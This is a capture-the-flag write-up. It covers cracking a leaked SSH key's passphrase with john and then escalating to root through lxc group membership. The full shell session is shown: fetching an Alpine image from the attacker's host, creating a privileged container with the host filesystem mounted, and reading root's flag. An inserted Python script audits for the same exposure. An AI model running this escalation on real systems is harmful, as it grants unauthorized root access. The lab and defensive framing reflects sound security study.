Running a simple content discovery with Burp, you will find a secret folder with a private SSH key and a corresponding wordlist to crack it. Load the key into john with ssh2john and you get its passphrase, allowing an SSH login with the key as the user you'd found in comments on the site. Yes, boring. cat user.txt, flag scored.
Looking for privesc, I found the user to be in the lxc group, so we can probably elevate by mounting the host's root filesystem as a disk inside a container, just like when you're in the docker group with Docker. Let's see.
Yup, as I thought. Build an Alpine LXC image, fetch it onto the box, and import it:
wget http://10.9.61.225:8000/alpine-v3.12-x86_64-20200923_1026.tar.gz
--2020-09-23 08:31:21--  http://10.9.61.225:8000/alpine-v3.12-x86_64-20200923_1026.tar.gz
Connecting to 10.9.61.225:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3215528 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200923_1026.tar.gz’

alpine-v3.12-x86_64-20200923_1026.tar.gz 100%[=======================================================================================================================================>]   3.07M   791KB/s    in 4.0s

2020-09-23 08:31:25 (787 KB/s) - ‘alpine-v3.12-x86_64-20200923_1026.tar.gz’ saved [3215528/3215528]

john@exploitable:~$ lxc image import alpine-v3.12-x86_64-20200923_1026.tar.gz --alias alpine
Image imported with fingerprint: 2ef98380d91867a7d01854e7a03b528e5880e90b30ba80f0dfb5731eb0009c8e
john@exploitable:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| alpine | 2ef98380d918 | no     | alpine v3.12 (20200923_10:26) | x86_64 | 3.07MB | Sep 23, 2020 at 8:31am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
john@exploitable:~$ lxc init alpine ignite -c security.privileged=true
Creating ignite
john@exploitable:~$ lxc config device add ignite alpine disk source=/ path=/mnt/root/ recursive=true
Device alpine added to ignite
john@exploitable:~$ lxc start ignite
john@exploitable:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
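The session above is exactly what a host audit should catch before anyone gets that far. The following script is an added example, not code from the writeup, and shows the two checks a defender would run: which local users are in groups that hand out root-equivalent control of the container daemon (lxd, lxc, docker), and which containers are privileged with a disk device rooted at the host's /. Both inputs are constructed sample text (an /etc/group excerpt and a `lxc config show` style YAML dump mirroring the "ignite" container), so it runs offline; the tiny YAML reader only handles the flat key/value shape that output has and is my own helper, not part of LXD.

```python
#!/usr/bin/env python3
"""Audit for LXD/LXC container privilege-escalation exposure (added example).

Check 1: users in root-equivalent groups (membership in lxd/lxc/docker lets a
         user mount the host filesystem into a privileged container).
Check 2: containers that are privileged AND expose the host's / as a disk.
On a real host, feed it /etc/group and `lxc config show <name>` output;
here both inputs are constructed samples so the script runs stand-alone.
"""

ROOT_EQUIVALENT_GROUPS = {"lxd", "lxc", "docker"}

# Constructed sample of /etc/group lines (not from a real host).
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:alice
lxd:x:116:john
docker:x:999:
bob:x:1001:
"""

# Constructed sample of `lxc config show ignite` output, mirroring the
# container built in the writeup (privileged, host / mounted at /mnt/root/).
SAMPLE_LXC_CONFIG = """\
architecture: x86_64
config:
  security.privileged: "true"
devices:
  alpine:
    path: /mnt/root/
    source: /
    type: disk
name: ignite
"""


def users_in_root_equivalent_groups(group_text):
    """Return {group: [users]} for every root-equivalent group that has members."""
    findings = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        users = [m for m in members.split(",") if m]
        if name in ROOT_EQUIVALENT_GROUPS and users:
            findings[name] = users
    return findings


def parse_simple_yaml(text):
    """Minimal reader for the 2-space-indented key/value YAML that
    `lxc config show` emits (no lists, no multi-line scalars). Hypothetical
    helper written for this example."""
    root = {}
    stack = [(-1, root)]  # (indent, mapping) pairs, innermost last
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip().strip('"')
        while stack[-1][0] >= indent:  # climb back out to the parent level
            stack.pop()
        parent = stack[-1][1]
        if value == "":  # a nested mapping follows on deeper-indented lines
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value
    return root


def risky_container_findings(config_text):
    """Return findings for a container whose config grants host root access:
    security.privileged=true and/or a disk device whose source is the host's /."""
    cfg = parse_simple_yaml(config_text)
    name = cfg.get("name", "<unknown>")
    findings = []
    if cfg.get("config", {}).get("security.privileged") == "true":
        findings.append(f"{name}: security.privileged=true (container root == host root)")
    for dev, props in cfg.get("devices", {}).items():
        if isinstance(props, dict) and props.get("type") == "disk" and props.get("source") == "/":
            findings.append(f"{name}: disk device '{dev}' exposes host / inside the container")
    return findings


def main():
    for group, users in users_in_root_equivalent_groups(SAMPLE_GROUP_FILE).items():
        print(f"[!] group '{group}' is root-equivalent; members: {', '.join(users)}")
    for finding in risky_container_findings(SAMPLE_LXC_CONFIG):
        print(f"[!] {finding}")


if __name__ == "__main__":
    main()
```

The first check is the one that matters most: once a user is in the lxd/lxc group, nothing in the container config can stop them, because they can create a privileged container themselves, so the fix is to keep that group empty and grant LXD admin through sudo instead. The second check is useful as a detection for containers that already exist, e.g. run it over `lxc config show` for every container from `lxc list`.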
Pwned. ez af 😛